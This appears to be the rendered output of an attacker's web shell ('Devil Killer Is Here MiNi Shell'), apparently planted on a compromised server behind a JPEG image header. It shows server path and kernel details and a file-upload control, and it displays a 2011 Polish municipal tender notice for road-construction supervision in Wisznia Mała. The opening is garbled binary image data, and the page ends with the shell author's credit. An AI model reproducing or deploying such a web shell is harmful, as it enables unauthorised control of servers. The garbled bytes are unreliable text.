JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110510/134091-N-2011.html

<p class="kh_header"><b>Wisznia Mała: PEŁNIENIE OBOWIĄZKÓW INŻYNIERA KONTRAKTU NAD REALIZACJĄ INWESTYCJI: Przebudowa drogi powiatowej nr 1367D na odcinku Wisznia Mała - Strzeszów</b><br>
<b>Numer ogłoszenia: 134091 - 2011; data zamieszczenia: 10.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE OBOWIĄZKÓW INŻYNIERA KONTRAKTU NAD REALIZACJĄ INWESTYCJI: Przebudowa drogi powiatowej nr 1367D na odcinku Wisznia Mała - Strzeszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera Kontraktu nad realizacją niżej opisanego zadania pn: Przebudowa drogi powiatowej nr 1367D na odcinku Wisznia Mała - Strzeszów. 
Zadanie współfinansowane w ramach projektu pn.: Przebudowa drogi powiatowej nr 1367 D na odcinku Wisznia Mała - Strzeszów w ramach Programu Wieloletniego pod nazwą Narodowy Program Przebudowy Dróg Lokalnych 2008-2011. 

2. Poniżej zamieszczono opis robót, których nadzorowanie stanowi przedmiot niniejszego zamówienia. 
Opis i charakterystyka budowy drogi:
Zadanie obejmuje: 
I.	przebudowę drogi nr 1367D w miejscowości Strzeszów, ul. Lipowa - długość ok 1600 mb,
II.	remont drogi nr 1367D od miejscowości Strzeszów do skrzyżowania z drogą krajową nr 5 w miejscowości Wisznia Mała - długość 1920 mb.
Ad. I:
Na odcinku objętym projektem przebudowy droga posiada przekrój szlakowy oraz jezdnię o nawierzchni bitumicznej szerokości oscylującej w granicach od 4.5 do 5,5 m. Wzdłuż drogi zlokalizowane są obustronne, gruntowe pobocza, w niedużej części umocnione. Klasa drogi: L.
Projektowana droga w miejscowości Strzeszów w całości przebiega przez teren zabudowy mieszkaniowej w skutek czego po obu jej stronach występują liczne zjazdy indywidualne do posesji graniczących bezpośrednio z pasem drogi powiatowej. W przeważającej części nawierzchnia w/w zjazdów jest nie urządzona. W ciągu rozpatrywanego odcinka występują trzy przystanki autobusowe, oddzielnie dla każdego kierunku ruchu, nie posiadające wyodrębnionej zatoki. Lokalny ruch pieszych odbywa się w obrębie gruntowych poboczy, gdzie również skupia się postój pojazdów mechanicznych. Odbiór wód opadowych następuje za pomocą otwartych rowów odprowadzających biegnących wzdłuż drogi powiatowej.
Projekt przebudowy drogi powiatowej w miejscowości Strzeszów obejmuje swoim zakresem:
1.	dostosowanie przedmiotowej drogi do następujących parametrów: klasa drogi: L, prędkość projektowa: 40 km/h, kategoria ruchu: KR2;
2.	korekcje przekroju poprzecznego przez poszerzenie jezdni drogi powiatowej do 6,0 m;
3.	budowę nowej konstrukcji jezdni na odcinku ok. 0,3 km;
4.	odnowę nawierzchni jezdni drogi powiatowej na odcinku ok. 1,3 km;
5.	budowę zatok autobusowych o nawierzchni z kostki kamiennej;
6.	budowę miejsc postojowych o nawierzchni z kostki kamiennej;
7.	budowę jednostronnego chodnika o nawierzchni z kostki betonowej (w centrum miejscowości Strzeszów z kostki kamiennej);
8.	odnowę nawierzchni skrzyżowań i zjazdów (w tym zjazdów do posesji indywidualnych) w granicach pasa drogowego drogi powiatowej;
9.	budowie przy krawężnikowych ścieków z kostki kamiennej;
10.	zagospodarowanie terenów nie objętych projektem układu drogowego przez pasy zieleni;
11.	budowę kanalizacji deszczowej wraz z budową ciągu drenarskiego;
12.	przebudowę istniejącej sieci wodociągowej wraz z przebudową kolidujących z projektowanym układem drogowym istniejących hydrantów;
13.	przebudowę kolidujących z projektowanym układem drogowym słupów oświetlenia ulicznego oraz wymianę słupów energetycznych niskiego napięcia w obrębie centrum miejscowości Strzeszów wraz z wymianą istniejących opraw oświetleniowych wzdłuż całego remontowanego odcinka drogi powiatowej;
14.	usunięcie wraz z karczowaniem kolidujących z nowoprojektowanym układem drogowym pni drzew;
15.	regulację studni istniejącej infrastruktury technicznej.
16.	wykonanie wraz z montażem trzech tablic promocyjnych- informacyjnych o wymiarach 60x40 cm o treści ustalonej z Zamawiającym.  
Całość inwestycji uzupełnia budowa niezbędnych, dla poprawnego funkcjonowania nowoprojektowanego układu drogowego elementów zagospodarowania terenu, takich jak: 
- budowa murów oporowych oraz ścianek czołowych, 
-montaż wiat przystankowych. 
Ad. II:
Droga powiatowa od skrzyżowania z drogą krajową nr 5 w Wiszni Małej do miejscowości Strzeszów będzie remontowana na odcinkach: 
1) od km 0+000 do km 1+750 i 
2) od km 3+300 do km 3+470. 
Nawierzchnia drogi jest bitumiczna o przekroju szlakowym, klasa L. Szerokość korony drogi waha się od 5,0 do 14.0 m. Szerokość jezdni wynosi około 5,0m. Jest ona zdeformowana i brak jest na niej prawidłowych spadków podłużnych i poprzecznych. Pobocza są zawyżone i nie umocnione. Przydrożne rowy są zamulone. Na tym odcinku przewiduje się stan projektowy:
1.	Funkcja drogi- droga bitumiczna o przekroju szlakowym klasy L;
2.	Prędkość projektowa - 40 km/h;
3.	kategoria ruchu - ICR2;
4.	Szerokość korony drogi- 5,0-14,0 m;
5.	Szerokość jezdni- ok. 5,5 m:
6.	Odwodnienie- odmulenie rowów przydrożnych;
7.	Pobocza- utwardzone materiałem kamiennym.
Na istniejącej konstrukcji jezdni drogi powiatowej przewiduje się wykonanie:
1.	warstwy wyrównawczej z BA 0/12,8 grubość zmienna śr. 100kg/m2;
2.	warstwy z MMA typu slurry seal 0/6 + siatka stalowa typu lekkiego, gr. 1 cm;
3.	warstwy ścieralnej z SMA 0/9,6, gr. 5 cm.
Przewiduje się powierzchniowy dwustronny spadek na jezdni 2% (przekrój daszkowy) na pobocze utwardzone tłuczniem ze spadkiem 3% do rowów przydrożnych.
Masy ziemne pozyskane w wyniku robót Wykonawca rozplantuje wzdłuż drogi, nie będzie więc konieczności wywozu na większą odległość.
Wykonawca zobowiązany jest wykonywać roboty z dwóch kierunków jednocześnie w szczególności dotyczy to chodnika w Strzeszowie. 
3. Zakres obowiązków Inżyniera Kontraktu: 
Inżynier Kontraktu będzie pełnił obowiązki Inwestora Zastępczego i będzie odpowiedzialny za prowadzenie profesjonalnego i kompletnego nadzoru inwestorskiego nad robotami wraz z udzielaniem stałych konsultacji i fachowych porad Zamawiającemu. Zadania w ramach niniejszego zamówienia będą obejmować co najmniej następujące czynności: 
a. Analizę dokumentacji przetargowej w szczególności sprawdzanie przedmiarów robót dołączonych do ofert Wykonawców, sprawdzanie harmonogramów robót i innych dokumentów związanych z wyborem Wykonawcy budowy drogi. 
b. Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem, pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,  
c. Przekazanie placu budowy przy udziale Zamawiającego i Wykonawcy robót.
d. Sprawdzanie jakości wykonywanych robót budowlanych i wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, 
e. Sprawdzenie i odbieranie robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowywanie i przeprowadzanie odbiorów gotowych obiektów budowlanych 
f. Potwierdzanie faktyczne wykonanych robót, oraz potwierdzenie usunięcia wykrytych wad i usterek  
g. Wydawanie Wykonawcy robot, kierownikowi budowy lub kierownikowi robót poleceń dotyczących usunięcia nieprawidłowości lub zagrożeń,  
h. Przygotowywanie świadectw dotyczących: 
- aprobat technicznych, 
- prób materiałów i robót, 
- ilości wykonanych robót i przejęcia robót, 
i. Egzekwowanie zgodności wykonanych robót z określonymi wymaganiami technicznymi i zapisami umowy,      
j. Współpracowanie z nadzorem autorskim, archeologicznym zapewnionym przez Zamawiającego, 
k, Kontrolę Wykonawcy robót, w celu zapewnienia realizacji robot zgodnie z odpowiednimi wymaganiami bezpieczeństwa i higieny pracy, 
l. Egzekwowanie terminowego wykonania robót przez Wykonawcę robót - zgodnie  zatwierdzonym harmonogramem robót,  
ł. Potwierdzenie gotowości inwestycji do odbioru, na podstawie zgłoszenia Wykonawcy robót oraz oceny poszczególnych inspektorów nadzoru, 
m. Przygotowanie i przeprowadzenie odbioru końcowego inwestycji , przy udziale przedstawicieli Zamawiającego i przyszłych użytkowników, 
n. Dostarczenie Zamawiającemu kompletnej dokumentacji powykonawczej, otrzymanej od Wykonawcy robót, w dniu odbioru końcowego inwestycji, 
o. Przygotowanie wszystkich niezbędnych dokumentów do uzyskania pozwolenia na użytkowanie,
p. Egzekwowanie od Wykonawcy robót wszystkich warunków realizacji umowy zawartej pomiędzy Zamawiającym a Wykonawcą, w tym usunięcia usterek stwierdzonych w trakcie realizacji i na dzień odbioru,
r. Uczestnictwo w komisjach powołanych przez Zamawiającego dla oceny jakości robót w okresie gwarancji i rękojmi. Częstotliwość przeglądów gwarancyjnych: przeglądy gwarancyjne będą przeprowadzane co 12 miesięcy przez okres 3 lat liczone od chwili uzyskania pozwolenia na użytkowanie, 
s. Bieżącą analizę i weryfikację kosztów realizacji w układzie poszczególnych pozycji kalkulacyjnych z informowaniem na bieżąco Zamawiającego, 
t. Nadzorowanie ewentualnych robót dodatkowych w zakresie jak dla zamówienia podstawowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usług, zamówień uzupełniających stanowiących nie więcej niż 50 % zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia i jest zgodne z przedmiotem zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawijący nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku:
 1.2.1 wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonali lub wykonują co najmniej 2  zamówienia polegające na pełnieniu samodzielnej funkcji Inżyniera/Inżyniera Rezydenta/Koordynatora kontraktu/ Inspektora nadzoru na inwestycji lub inwestycjach obejmujących budowę, przebudowę, lub remont drogi publicznej o wartości co najmniej 1 000 000 PLN brutto każde.  

1.2.2 Wykonawca może polegać na wiedzy i doświadczeniu, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami, niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.3.1.Opis sposobu dokonywania oceny spełniania warunku Wykonawca spełnia warunek, jeżeli dysponuje:
a. Inspektora nadzoru w specjalności drogowej posiadającym: 
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
b. Inspektorem nadzoru w specjalności sanitarnej posiadającym:
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c. Inspektorem nadzoru w specjalności elektrycznej posiadającym: 
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Sporządzony przez wykonawcę Formularz Ofertowy stanowiący załącznik nr 1 do SIWZ;
b. oświadczenie  o spełnieniu warunków udziału w postępowaniu, zgodnie z wzorem przedstawionym w załączniku nr 2 do SIWZ.
c. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w rozdziale 6 ust. 2 pkt b oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią wykonawcy, imienną pieczątką osoby upoważniającej oraz jej podpisem;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.Zmiany lub uzupełnienia:
a)	Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają formy pisemnej w postaci aneksów do umowy, pod rygorem nieważności. 
b)	Prawa i obowiązki wynikające z niniejszej umowy lub części, mogą być przeniesione na rzecz osób trzecich, wyłącznie za zgodą Stron.
c)	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji umowy przez Wykonawcę robót budowlanych.
d)	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany podwykonawców w przypadku:
- wprowadzenia nowego podwykonawcy,
- rezygnacji podwykonawcy,
- zmiany wartości lub zakresu części przedmiotu zamówienia, wykonywanych przez podwykonawców, zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.
e)	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany ceny brutto: w przypadku zmiany stawki podatku VAT dla usług objętych przedmiotem zamówienia w trakcie realizacji przedmiotu umowy strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
f)	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany kluczowego personelu Wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia w przypadku:
- śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych, 
- zastrzeżeń jednej ze stron co do kompetencji ww osób. 
W przypadku zmiany osoby wskazanej w ofercie przetargowej Wykonawcy jako osoby pozostające w dyspozycji Wykonawcy do realizacji zamówienia Wykonawca ma obowiązek zastąpić tę osobę osobą posiadającą niemniejsze kwalifikacje niż kwalifikacje wymagane przez Zamawiającego w ramach ustanowionych w postępowaniu o zamówienie publiczne warunków udziału w tym postępowaniu. 
g) Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę natomiast powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiszniamala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 10:00, miejsce: Urząd Gminy Wisznia Mała ul. Wrocławska 9 55-114 Wisznia Mała pok. nr 3 parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com